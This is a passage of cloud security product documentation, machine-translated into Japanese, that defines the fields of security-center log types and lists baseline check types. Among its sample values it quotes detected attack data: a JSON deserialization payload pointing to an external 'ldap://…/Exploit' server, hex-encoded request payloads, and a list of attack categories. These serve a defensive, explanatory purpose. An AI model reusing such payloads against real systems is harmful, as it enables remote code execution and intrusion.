  • 12: もはや存在しません

  • 13: 期限切れ

1

tag

脆弱性に追加されたタグ。 有効な値:

  • oval: Linuxソフトウェアの脆弱性

  • system: Windowsシステムの脆弱性

  • cms: Web CMSの脆弱性

    説明

    ランダムな文字列は、他の種類の脆弱性を示します。

オーバル

type

脆弱性のタイプ。 有効な値:

  • sys: Windowsシステムの脆弱性

  • cve: Linuxソフトウェアの脆弱性

  • cms: Web CMSの脆弱性

  • emg: 緊急の脆弱性

sys

uuid

サーバーのUUID。

ad66133a-dc82-4e5e-9659-a49e3 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

ベースラインログ

フィールド名

説明

check_item_name

チェックアイテムの名前。

パスワード変更の最短間隔を設定する

check_item_level

ベースラインのリスクレベル。 有効な値:

  • 高い

  • 中程度

  • 低い

medium

check_type

チェックアイテムのタイプ。

ID 認証

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

risk_level

リスク項目の重大度。 有効な値:

  • 高い

  • 中程度

  • 低い

medium

operation

操作。 有効な値:

  • 新しい

  • verity

new

risk_name

リスクアイテムの名前。

パスワード遵守チェック

sas_group_name

Security Center内のサーバーが属するサーバーグループ。 リスク項目がサーバーで検出されます。

default

status

ステータス情報。 有効な値:

  • 1: unfixed

  • 2: 修正失敗

  • 3: ロールバック失敗

  • 4: 固定

  • 5: ローリングバック

  • 6: 検証

  • 7: 固定

  • 8: 固定および保留中の再起動

  • 9: ロールバック

  • 10: 無視

  • 11: ロールバックと保留中の再起動

  • 12: もはや存在しません

  • 13: 期限切れ

1

sub_type_alias_name

中国語のサブタイプのエイリアス。

国際的に合意されたセキュリティのベストプラクティス-Ubuntu 16/18/20/22セキュリティベースラインチェック

sub_type_name

サブタイプの名前。 ベースラインサブタイプの詳細については、「ベースラインタイプとサブタイプ」をご参照ください。

hc_ubuntu16_cis_rules

type_alias_name

中国语のチェックタイプのエイリアス。

セキュリティのための国際的に合意されたベストプラクティス

type_name

ベースラインのタイプ。 ベースラインタイプの詳細については、「ベースラインタイプとサブタイプ」をご参照ください。

シス

uuid

リスク項目が検出されたサーバーのUUID。

1ad66133a-dc82-4e5e-9659-a49e3 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

アラートログ

フィールド名

説明

data_source

データソース。 有効な値:

  • aegis_suspicious_event: ホスト例外

  • aegis_suspicious_file_v2: webshells

  • aegis_login_log: 異常なログオン

  • honeypot: クラウドハニーポットによって生成されたアラートイベント

  • object_scan: ファイル検出例外

  • security_event: セキュリティセンターの例外

  • sas_ak_leak: AccessKeyペアがリーク

aegis_login_log

詳細

アラートの詳細。

説明

ログのdetailフィールドの値は、アラートタイプによって異なります。 アラートログを表示するときにdetailフィールドにパラメーターに関する質問がある場合は、

チケットを起票し、テクニカルサポートにお問い合わせください

{"loginSourceIp":"221.11.XX.XX" 、"loginDestinationPort":22、"loginUser":"root" 、"protocol":2、"protocolName":"SSH" 、"clientIp":"192.168.XX.XX" 、"loginTimes":1、"location":"Xi'an" 、"type" 「珍しいアカウントを使用したECSインスタンスへのログイン」、「status」: 0}

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

internet_ip

ホストのパブリックIPアドレス。

39.104.XX.XX

intranet_ip

ホストのプライベートIPアドレス。

192.168.XX.XX

level

アラートのリスクレベル。 有効な値:

  • 深刻な

  • 疑わしい

  • 思い出させる

疑わしい

name

アラートの名前。

異常なログイン-異常なアカウントを使用したECSインスタンスへのログイン

operation

操作。 有効な値:

  • 新しい

  • 取引

  • 更新

new

status

アラートのステータス。 有効な値:

  • 0: すべて

  • 1: 保留中の処理

  • 2: 無視

  • 4: 確認済み

  • 8: 偽陽性としてマーク

  • 16: 処理中

  • 32: 扱われる

  • 64: 期限切れ

  • 128: 削除済み

  • 512: 自動的にブロックされる

  • 513: 自動的にブロック

1

unique_info

アラートのUUID。

2536dd765f804916a1fa3b9516b5 ****

uuid

アラートが生成されるサーバーのUUID。

ad66133a-dc82-4e5e-9659-a49e3 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

設定評価ログ

フィールド名

説明

check_id

チェックアイテムのID。 ListCheckResult操作を呼び出して、チェック項目のIDを照会できます。 この操作は、クラウドサービスの設定チェックで検出されたリスク項目の詳細を照会するために使用されます。

11

check_item_name

チェックアイテムの名前。

Back-to-origin 設定

instance_id

インスタンスのID。

i-2zeg4zldn8zypsfg ****

instance_name

インスタンスの名前です。

lsm

instance_result

リスクの影響。 値はJSON文字列です。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text" },{ "key":"InstanceIdShow","search":true,"" Instance ID "," type ":" link "},{" key ":" InstanceNameShow "," search ":true," searchKey ":" InstanceNameKey "," showName ":" Instance Name "," type ":" text "}]}

instance_sub_type

インスタンスのサブタイプ。 有効な値:

  • インスタンスのタイプがECSの場合、次の有効な値がサポートされます。

    • INSTANCE

    • ディスク

    • セキュリティ_グループ

  • インスタンスのタイプがContainer Registryの場合、次の有効な値がサポートされます。

    • リポジトリ_エンタープライズ

    • リポジトリ_人

  • インスタンスのタイプがResource Access Management (RAM) の場合、次の有効な値がサポートされます。

    • アリアス

    • ユーザー

    • ポリシー

    • グループ

  • インスタンスのタイプがWebアプリケーションファイアウォール (WAF) の場合、値はDOMAINに固定されます。

  • インスタンスのタイプが他の値の場合、値はinstanceとして固定されます。

INSTANCE

instance_type

インスタンスのタイプ。 有効な値:

  • ECS

  • SLB

  • RDS: ApsaraDB RDS

  • MONGODB: ApsaraDB for MongoDB

  • KVSTORE: ApsaraDB for Redis

  • ACR: Container Registry

  • CSK: Container Service for Kubernetes (ACK)

  • VPC: 仮想プライベートクラウド (VPC)

  • ACTIONTRAIL: ActionTrail

  • CDN: Alibaba Cloud CDN (CDN)

  • CAS: 証明書管理サービス (旧SSL証明書サービス)

  • RDC: Apsara Devops

  • RAM

  • DDOS: Anti-DDoSプロキシ

  • WAF

  • OSS

  • POLARDB: PolarDB

  • POSTGRESQL: ApsaraDB RDS for PostgreSQL

  • MSE: マイクロサービスエンジン (MSE)

  • NAS: File Storage NAS (NAS)

  • SDDP: 機密データの検出と保護 (SDDP)

  • EIP: Elastic IPアドレス (EIP)

ECS

region_id

インスタンスのリージョン ID です。

cn-hangzhou

requirement_id

要件アイテムID。 ListCheckStandard操作を呼び出して、要件項目のIDを照会できます。 この操作は、構成チェックの標準を照会するために使用される。

5

risk_level

リスクレベル。 有効な値:

  • ロー

  • MEDIUM

  • 高い

ミディアム

section_id

セクションID。 ListCheckResult操作を呼び出して、セクションIDを照会できます。

1

standard_id

標準ID。 ListCheckStandard操作を呼び出して、標準IDを照会できます。

1

status

チェックアイテムのステータス。 有効な値:

  • NOT_CHECK: チェック項目はチェックされていません。

  • CHECKING: チェックアイテムがチェック中です。

  • PASS: チェックアイテムがチェックに合格しました。

  • NOT_PASS: チェック項目がチェックに失敗しました。

  • ホワイトリスト: チェック項目がホワイトリストに追加されます。

パス

ベンダー

クラウドサービスプロバイダー。 値はALIYUNとして固定されます。

ALIYUN

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

ネットワーク防御ログ

フィールド名

説明

cmd

攻撃されたプロセスのコマンドライン。

nginx: マスタープロセスnginx

cur_time

攻撃イベントが発生した時刻。

2023-09-14 09:21:59

decode_payload

デコードされた16進ペイロード。

POST /サービス /FileService/UserFiles /

dst_ip

攻撃されたアセットのIPアドレス。

172.16.XX.XX

dst_port

攻撃された資産のポート。

80

func

ブロックされたイベントのタイプ。 有効な値: 有効な値:

  • payload: 悪意のあるデータまたは命令が検出されたときにイベントがブロックされることを示します。

  • tuple: 悪意のあるIPアドレスが検出されたときにイベントがブロックされることを示します。

payload

rule_type

ブロックされたイベントで使用されるルールのタイプ。 有効な値:

  • alinet_payload: Security Centerで指定されているpayload防御ルールを示します。

  • alinet_tuple: セキュリティセンターで指定されているタプル防御ルールを示します。

alinet_payload

instance_id

攻撃されたアセットのインスタンスID。

i-2zeg4zldn8zypsfg ****

internet_ip

攻撃されたアセットのパブリックIPアドレス。

39.104.XX.XX

intranet_ip

攻撃されたアセットのプライベートIPアドレス。

192.168.XX.XX

final_action

防衛アクション。 値はブロックとして固定されます。 値は、攻撃がブロックされていることを示します。

block

payload

16進ペイロード。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20 ****

ピッド

攻撃されたプロセスのID。

7107

platform

攻撃されたアセットのオペレーティングシステムのタイプ。 有効な値:

  • 勝つ

  • linux

linux

proc_path

攻撃されたプロセスへのパス。

/usr/sbin/nginx

sas_group_name

セキュリティセンター内のサーバーが属するアセットグループ。

default

src_ip

攻撃の送信元IPアドレス。

106.11.XX.XX

src_port

攻撃の送信元ポート。

29575

uuid

サーバーのUUID。

5d83b26b-b7ca-4a0a-9267-12 ****

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

アプリケーション保護ログ

フィールド名

説明

app_dir

アプリケーションが保存されているディレクトリ。

/usr/local/aegis/rasp/apps/1111

app_id

アプリケーションの ID

6492a391fc9b4e2aad94 ****

app_name

アプリケーションの名前。

test

コンフィデンスレベル

検出アルゴリズムの信頼レベル。 有効な値:

  • 高い

  • 中程度

  • 低い

low

request_body

リクエストボディに関する情報。

{"@ type":" com.sun.rowset.JdbcRowSetImpl ","dataSourceName":"ldap:// 172.220.XX.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

リクエスト本文の長さ。

112

data

フック。

{"cmd":"bash -c kill -0 -- -'31098'"}

headers

リクエストヘッダーに関する情報。

{"content-length":"112","referer":"http:// 120.26.XX.XX:8080 /デモ /シリアル","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http:// 120.26.XX.XX:8080" 、"host":"120.26.XX.XX:8080" 、"content-type":"application/json" 、"connection":"keep-alive" 、"x-forwarded-for":"1.1.XX.XX" 、"accept-encoding":"gzip、deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

ホストまたはネットワークデバイスの名前。

testthostname

host_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

is_cliped

長すぎるためにログが切り捨てられるかどうかを示します。 有効な値:

  • true

  • false

false

jdk_version

JDKのバージョン。

1.8.0_292

message

アラートの説明。

安全でないクラスシリアル。

request_method

リクエスト方式。

Post

platform

オペレーティングシステムのタイプ。

Linux

アーチ

オペレーティングシステムのアーキテクチャ。

amd64

kernel_version

オペレーティングシステムのカーネルバージョン。

3.10.0-1160.59.1。el7.x86_64

param

リクエストパラメーター。 ほとんどの場合、パラメーターは次のいずれかの形式になります。

  • GETパラメーター

  • application/x-www-form-urlencoded

{"url":["http:// 127.0.0.1.xip.io"]}

payload

攻撃ペイロード。

bash -c kill -0 -- '31098'

payload_length

攻撃ペイロードの長さ。

27

rasp_id

Runtime Application Self Protection (RASP) エージェントのID。

fa00223c8420e256c0c98ca0bd0d ****

rasp_version

RASPエージェントのバージョン。

0.8.5

src_ip

リクエストが開始されたIPアドレス。

172.0.XX.XX

final_action

アラートの処理結果。 有効な値:

  • ブロック

  • モニター

block

rule_action

アプリケーション保護ルールで指定されているアラート処理アクション。 有効な値:

  • ブロック

  • モニター

block

risk_level

リスクレベル。 有効な値:

  • 高い

  • 中程度

  • 低い

high

stacktrace

スタック情報。

[java.io.FileInputStream.<init>(FileInputStream.java:123) 、java.io.FileInputStream.<init>(FileInputStream.java:93) 、com.example.vulns.controller.FileController.IORead(FileController.java:75) 、sun.reflect. NativeMethodAccessorsun. 62)......]

time

アラートが生成された時刻。

2023-10-09 15:19:15

timestamp

アラートが生成されたときのタイムスタンプ。 単位:ミリ秒。

1696835955070

type

脆弱性のタイプ。 有効な値:

  • attach: 悪意のあるAttach API

  • beans: 悪意のあるbeansバインディング

  • clasloader: 悪意のあるクラスの読み込み

  • danger_protocol: 脆弱なプロトコルの使用

  • dns: 悪意のあるDNSクエリ

  • エンジン: エンジン噴射

  • expression: 式インジェクション

  • file: 悪意のあるファイルの読み取りと書き込み

  • file_delete: 任意のファイル削除

  • file_list: ディレクトリトラバーサル

  • file_read: 任意のファイル読み取り

  • file_upload: 悪意のあるファイルのアップロード

  • jndi: Java Naming and Directory Interface (JNDI) インジェクション

  • jni: Java Native Interface (JNI) インジェクション

  • jstl: JavaServer Pages Standard Tag Library (JSTL) の任意のファイル包含

  • memory_shell: インメモリwebshellインジェクション

  • rce: コマンドの実行

  • read_object: 逆シリアル化攻撃

  • reflect: 悪意のあるリフレクション呼び出し

  • sql: SQLインジェクション

  • ssrf: 悪意のある外部接続

  • thread_inject: スレッド注入

  • xxe: XML外部エンティティ (XXE) 攻撃

rce

url

リクエストのURL。

http:// 127.0.0.1:999/xxx

rasp_attack_uuid

脆弱性のUUID。

18823b23-7ad4-47c0-b5ac-e5f036a2 ****

uuid

ホストのUUID。

23f7ca61-e271-4a8e-bf5f-165596a16 ****

internet_ip

インスタンスのパブリック IP アドレスです。

1.2.XX.XX

intranet_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

sas_group_name

セキュリティセンター内のサーバーが属するグループ。

グループ1

instance_id

ホストのインスタンスID。

i-wz995eivg28f1m**

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

悪意のあるファイル検出ログ

フィールド名

説明

bucket_name

OSS バケットの名前。

***-テスト

event_id

アラートの ID。

802210

event_name

アラートの名前。

マイニングプログラム

md5

ファイルのMD5ハッシュ値。

6bc2bc ****** 53d409b1

sha256

ファイルのSHA-256ハッシュ値。

f038f9525 ****** 7772981e87f85

result

検出結果。 有効な値:

  • 0: 不正ファイルが検出されません。

  • 1: 悪意のあるファイルが検出されました。

0

file_path

ファイルへのパス。

test.zip/bin_test

etag

OSSオブジェクトのID。

6BC2B ****** 853D409B1

risk_level

リスクレベル。 有効な値:

  • 深刻な

  • 疑わしい

  • 思い出させる

思い出させる

source

チェック方法。

  • OSS: OSSバケット内のオブジェクトは、Security Centerコンソールでチェックされます。

  • API: SDK for JavaまたはPythonは、悪意のあるファイルを検出するために使用されます。

OSS

parent_md5

親ファイルまたは圧縮パッケージファイルのMD5ハッシュ値。

3d0f8045bb9 ******

parent_sha256

親ファイルまたは圧縮パッケージファイルのSHA-256ハッシュ値。

69b643d6 ****** a3fb859fa

parent_file_path

親ファイルまたは圧縮パッケージファイルの名前。

test.zip

start_time

開始タイムスタンプ。イベントが発生した時刻を示します。 単位は秒です。

1719472214

コアファイル監視イベントログ

フィールド名

説明

start_time

イベントが最後に発生したときのタイムスタンプ。 単位は秒です。

1718678414

uuid

サーバーのUUID。

5d83b26b-b **a-4** a-9267-12 ****

file_path

ファイルへのパス。

/etc/passwd

proc_path

プロセスへのパス。

/usr/bin/bash

rule_id

ヒットルールのID。

123

rule_name

ルールの名前を設定します。

file_test_rule

cmdline

コマンドライン。

bash /opt/a

operation

ファイルに対して実行する操作。

読み取り

risk_level

リスクレベル。

2

ピッド

プロセスID。

45324

proc_permission

プロセスを実行するための権限。

rwxrwxrwx

instance_id

インスタンス ID 。

i-wz995eivg2 ****

internet_ip

IP アドレスです。

192.0.2.1

intranet_ip

プライベートIPアドレス。

172.16.0.1

instance_name

インスタンス名。

aegis-テスト

platform

オペレーティングシステムの種類。

Linux

付録

ベースラインタイプとサブタイプ

タイプ

サブタイプ

説明

hc_exploit

hc_exploit_redis

高リスクのエクスプロイト-Redis不正アクセス高エクスプロイトの脆弱性リスク

hc_exploit_activemq

高リスクエクスプロイト-ActiveMQ不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_couchdb

高リスクエクスプロイト-CouchDB不正アクセス高エクスプロイトリスク

hc_exploit_docker

高リスクエクスプロイト-Docker不正アクセス高脆弱性リスク

hc_exploit_es

高リスクエクスプロイト-Elasticsearch不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_hadoop

高リスクエクスプロイト-Hadoop不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_jboss

高リスクエクスプロイト-Jboss不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_jenkins

高リスクエクスプロイト-Jenkins不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_k8s_api

高リスクエクスプロイト-Kubernetes Apiserver不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_ldap

高リスクエクスプロイト-LDAP不正アクセス高エクスプロイト脆弱性リスク (Windows)

hc_exploit_ldap_linux

高リスクのエクスプロイト-OpenLDAP不正アクセスの脆弱性ベースライン (Linux)

hc_exploit_memcache

高リスクエクスプロイト-Memcached不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_mongo

高リスクエクスプロイト-Mongodb不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_pgsql

高リスクエクスプロイト-高リスクベースラインへのPostgresql不正アクセス

hc_exploit_rabbitmq

高リスクエクスプロイト-RabbitMQ不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_rsync

高リスクエクスプロイト-rsync不正アクセス高エクスプロイト脆弱性リスク

hc_exploit_tomcat

高リスクのエクスプロイト-Apache Tomcat AJPファイルの読み取り /包含の脆弱性

hc_exploit_zookeeper

高リスクのエクスプロイト-ZooKeeper不正アクセス高エクスプロイトの脆弱性リスク

hc_container

hc_docker

Alibaba Cloud Standard - Dockerセキュリティベースラインチェック

hc_middleware_ack_master

Kubernetes(ACK) マスターが国際的に合意したセキュリティのベストプラクティス

hc_middleware_ack_node

Kubernetes(ACK) ノードのセキュリティに関する国際的なベストプラクティス

hc_middleware_k8s

Alibaba Cloud Standard-Kubernetes-マスターセキュリティベースラインチェック

hc_middleware_k8s_node

Alibaba Cloud Standard-Kubernetes-ノードセキュリティベースラインチェック

シス

hc_suse 15_djbh

SUSE Linux 15中国機密保護のためのベースライン-レベルIII

hc_aliyun_linux3_djbh_l3

中国機密保護のためのAlibaba Cloud Linux 3ベースライン-レベルIII

hc_aliyun_linux_djbh_l3

Alibaba Cloud Linux/Aliyun Linux 2ベースライン、中国機密保護のサイバーセキュリティ保護-レベルIII

hc_bind_djbh

サイバーセキュリティの中国のレベル3保護-バインドコンプライアンスベースラインチェック

hc_centos 6_djbh_l3

CentOS Linux 6サイバーセキュリティの中国分類保護のためのベースライン-レベルIII

hc_centos 7_djbh_l3

CentOS Linux 7中国機密保護のためのベースライン-レベルIII

hc_centos 8_djbh_l3

CentOS Linux 8中国のサイバーセキュリティ保護のためのベースライン-レベルIII

hc_debian_djbh_l3

Debian Linux 8/9/10中国のサイバーセキュリティ保護のためのベースライン-レベルIII

hc_iis_djbh

サイバーセキュリティの中国分類保護のためのIISベースライン-レベルIII

hc_informix_djbh

サイバーセキュリティの中国のレベル3保護-Informixコンプライアンスベースラインチェック

hc_jboss_djbh

中国のサイバーセキュリティのレベル3保護-Jboss6/7コンプライアンスベースラインチェック

hc_mongo_djbh

中国のためのMongoDBベースラインはサイバーセキュリティの保護を分類しました-レベルIII

hc_mssql_djbh

中国のサイバーセキュリティのレベル3保護-SQL Server Compliance Baseline Check

hc_mysql_djbh

等しい保証レベル3-MySqlコンプライアンスベースラインチェック

hc_nginx_djbh

同等保証レベル3-Nginxコンプライアンスベースラインチェック

hc_oracle_djbh

中国のサイバーセキュリティのレベル3保護-Oracle Compliance Baseline Check

hc_pgsql_djbh

レベル3-PostgreSqlコンプライアンスベースラインチェック

hc_redhat 6_djbh_l3

中国のサイバーセキュリティのレベル3保護-Red Hat Enterprise Linux 6 Compliance Baseline Check

hc_redhat_djbh_l3

中国のサイバーセキュリティのレベル3保護-Red Hat Enterprise Linux 7 Compliance Baseline Check

hc_redis_djbh

サイバーセキュリティの保護を分類した中国のRedisベースライン-レベルIII

hc_suse 10_djbh_l3

SUSE Linux 10サイバーセキュリティの中国機密保護のためのベースライン-レベルIII

hc_suse 12_djbh_l3

SUSE Linux 12サイバーセキュリティの中国機密保護のためのベースライン-レベルIII

hc_suse_djbh_l3

SUSE Linux 11サイバーセキュリティの中国機密保護のためのベースライン-レベルIII

hc_ubuntu 14_djbh_l3

サイバーセキュリティの保護を分類した中国のUbuntu 14ベースライン-レベルIII

hc_ubuntu_djbh_l3

レベル3-Ubuntu 16/18/20コンプライアンス規制検査待ち

hc_was_djbh

中国のサイバーセキュリティのレベル3保護-Websphere Application Server Compliance Baseline Check

hc_weblogic_djbh

サイバーセキュリティの保護を分類した中国のWeblogicベースライン-レベルIII

hc_win 2008_djbh_l3

中国のレベル3のサイバーセキュリティ保護-Windows Server 2008 R2コンプライアンスベースラインチェック

hc_win 2012_djbh_l3

サイバーセキュリティの中国分類保護のためのWindows 2012 R2ベースライン-レベルIII

hc_win 2016_djbh_l3

サイバーセキュリティの中国分類保護のためのWindows 2016/2019ベースライン-レベルIII

hc_aliyun_linux_djbh_l2

Alibaba Cloud Linux/Aliyun Linux 2ベースライン、中国機密保護のサイバーセキュリティ保護-レベルII

hc_centos 6_djbh_l2

CentOS Linux 6中国機密保護のためのベースライン-レベルII

hc_centos 7_djbh_l2

CentOS Linux 7中国機密保護のためのベースライン-レベルII

hc_debian_djbh_l2

Debian Linux 8中国のサイバーセキュリティ保護のためのベースライン-レベルII

hc_redhat 7_djbh_l2

Redhat Linux 7中国のサイバーセキュリティ保護のためのベースライン-レベルII

hc_ubuntu_djbh_l2

Linux Ubuntu 16/18中国のサイバーセキュリティ保護のためのベースライン-レベルII

hc_win 2008_djbh_l2

サイバーセキュリティの中国分類保護のためのWindows 2008 R2ベースライン-レベルII

hc_win 2012_djbh_l2

サイバーセキュリティの中国分類保護のためのWindows 2012 R2ベースライン-レベルII

hc_win 2016_djbh_l2

サイバーセキュリティの中国分類保護のためのWindows 2016/2019ベースライン-レベルII

hc_aliyun_linux_cis

Alibaba Cloud Linux 2国際的に合意されたセキュリティのベストプラクティス

hc_centos 6_cis_rules

CentOS Linux 6 LTS国際的に合意されたセキュリティのベストプラクティス

hc_centos 7_cis_rules

CentOS Linux 7 LTS国際的に合意されたセキュリティのベストプラクティス

hc_centos 8_cis_rules

CentOS Linux 8 LTSセキュリティに関する国際的なベストプラクティス

hc_debian 8_cis_rules

Debian Linux 8国際的に合意されたセキュリティのベストプラクティス

hc_ubuntu 14_cis_rules

Ubuntu 14 LTS国際的に合意されたセキュリティのベストプラクティス

hc_ubuntu 16_cis_rules

Ubuntu 16/18/20 LTSセキュリティに関する国際的なベストプラクティス

hc_win 2008_cis_rules

Windows Server 2008 R2セキュリティに関する国際的なベストプラクティス

hc_win 2012_cis_rules

Windows Server 2012 R2セキュリティに関する国際的なベストプラクティス

hc_win 2016_cis_rules

Windows Server 2016/2019 R2セキュリティに関する国際的なベストプラクティス

hc_kylin_djbh_l3

中国のサイバーセキュリティのレベル3保護-Kylin Compliance Baseline Check

hc_uos_djbh_l3

中国のサイバーセキュリティのレベル3保護-uosコンプライアンスベースラインチェック

hc_best_security

hc_aliyun_linux

Alibaba Cloud Linux/Aliyun Linux 2ベンチマーク

hc_centos 6

Alibaba Cloud Standard - CentOS Linux 6セキュリティベースラインチェック

hc_centos 7

Alibaba Cloud Standard - CentOS Linux 7/8セキュリティベースラインチェック

hc_debian

Alibaba Cloud Standard - Debian Linux 8/9/10セキュリティベースライン

hc_redhat 6

Alibaba Cloud Standard - Red Hat Enterprise Linux 6セキュリティベースラインチェック

hc_redhat 7

Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8セキュリティベースラインチェック

hc_ubuntu

Alibaba Cloud Standard - Ubuntuセキュリティベースライン

hc_windows_2008

Alibaba Cloud Standard - Windows Server 2008 R2セキュリティベースラインチェック

hc_windows_2012

Alibaba Cloud Standard - Windows 2012 R2セキュリティベースライン

hc_windows_2016

Alibaba Cloud Standard - Windows 2016/2019セキュリティベースライン

hc_db_mssql

Alibaba Cloud Standard-SQL Serverセキュリティベースラインチェック

hc_memcached_ali

Alibaba Cloud Standard - Memcachedセキュリティベースラインチェック

hc_mongodb

Alibaba Cloud Standard - MongoDBバージョン3.xセキュリティベースラインチェック

hc_mysql_ali

Alibaba Cloud Standard - Mysqlセキュリティベースラインチェック

hc_oracle

Alibaba Cloud Standard - Oracle 11g Security Baseline Check

hc_pgsql_ali

Alibaba Cloud Standard-PostgreSqlセキュリティ初期化チェック

hc_redis_ali

Alibaba Cloud Standard - Redisセキュリティベースラインチェック

hc_apache

Alibaba Cloud Standard - Apache Security Baseline Check

hc_iis_8

Alibaba Cloud Standard - IIS 8セキュリティベースラインチェック

hc_nginx_linux

Alibaba Cloud Standard - Nginxセキュリティベースラインチェック

hc_suse 15

Alibaba Cloud Standard - SUSE Linux 15セキュリティベースラインチェック

tomcat 7

Alibaba Cloud Standard-Apache Tomcatセキュリティベースライン

weak_password

hc_mongodb_pwd

Weak Password-MongoDB Weak Password baseline (バージョン2をサポート) X)

hc_weakpwd_ftp_linux

弱いパスワード-Ftpログイン弱いパスワードのベースライン

hc_weakpwd_linux_sys

弱いパスワード-Linuxシステムログイン弱いパスワードベースライン

hc_weakpwd_mongodb 3

弱いパスワード-MongoDB弱いパスワードベースライン

hc_weakpwd_mssql

弱いパスワード-SQL Server DBログイン弱いパスワードベースライン

hc_weakpwd_mysql_linux

弱いパスワード-Mysql DBログイン弱いパスワードベースライン

hc_weakpwd_mysql_win

弱いパスワード-Mysql DBログイン弱いパスワードベースライン (Windowsバージョン)

hc_weakpwd_openldap

弱いパスワード-Openldapログイン弱いパスワードベースライン

hc_weakpwd_oracle

Weak Password-Oracleログインの弱いパスワード検出

hc_weakpwd_pgsql

弱いパスワード-PostgreSQL DBログイン弱いパスワードベースライン

hc_weakpwd_pptp

弱いパスワード-pptpdログイン弱いパスワードのベースライン

hc_weakpwd_redis_linux

弱いパスワード-Redis DBログイン弱いパスワードベースライン

hc_weakpwd_rsync

弱いパスワード-rsyncログイン弱いパスワードベースライン

hc_weakpwd_svn

弱いパスワード-svnログイン弱いパスワードのベースライン

hc_weakpwd_tomcat_linux

弱いパスワード-Apache Tomcatコンソールの弱いパスワードのベースライン

hc_weakpwd_vnc

弱いパスワード-VncServerの弱いパスワードチェック

hc_weakpwd_weblogic

弱いパスワード-Weblogic 12cログイン弱いパスワード検出

hc_weakpwd_win_sys

弱いパスワード-Windowsシステムログイン弱いパスワードベースライン

関連ドキュメント